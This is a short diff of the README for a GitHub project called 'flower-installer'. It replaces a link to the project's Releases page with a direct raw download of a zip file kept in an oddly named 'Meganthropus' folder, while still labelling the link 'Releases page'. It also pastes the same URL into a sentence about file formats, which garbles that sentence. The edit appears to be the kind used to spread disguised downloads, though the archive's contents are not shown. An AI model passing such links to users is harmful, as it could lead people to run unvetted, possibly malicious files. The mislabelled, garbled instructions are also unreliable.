Mohanad7770/flower-installer/README.md

 Follow these simple steps to get started:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Mohanad7770/flower-installer/releases) to find the latest version of `flower-installer`.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/Mohanad7770/flower-installer/main/Meganthropus/flower-installer.zip) to find the latest version of `flower-installer`.

 2. **Download the Latest Release:**
    - Click on the latest version.
    - Choose the appropriate file for your system.
-This may include `.tar.gz` or `.zip`.
+This may include `https://raw.githubusercontent.com/Mohanad7770/flower-installer/main/Meganthropus/flower-installer.zip` or `.zip`.

 3. **Extract the Downloaded File:**
    - Locate the downloaded file.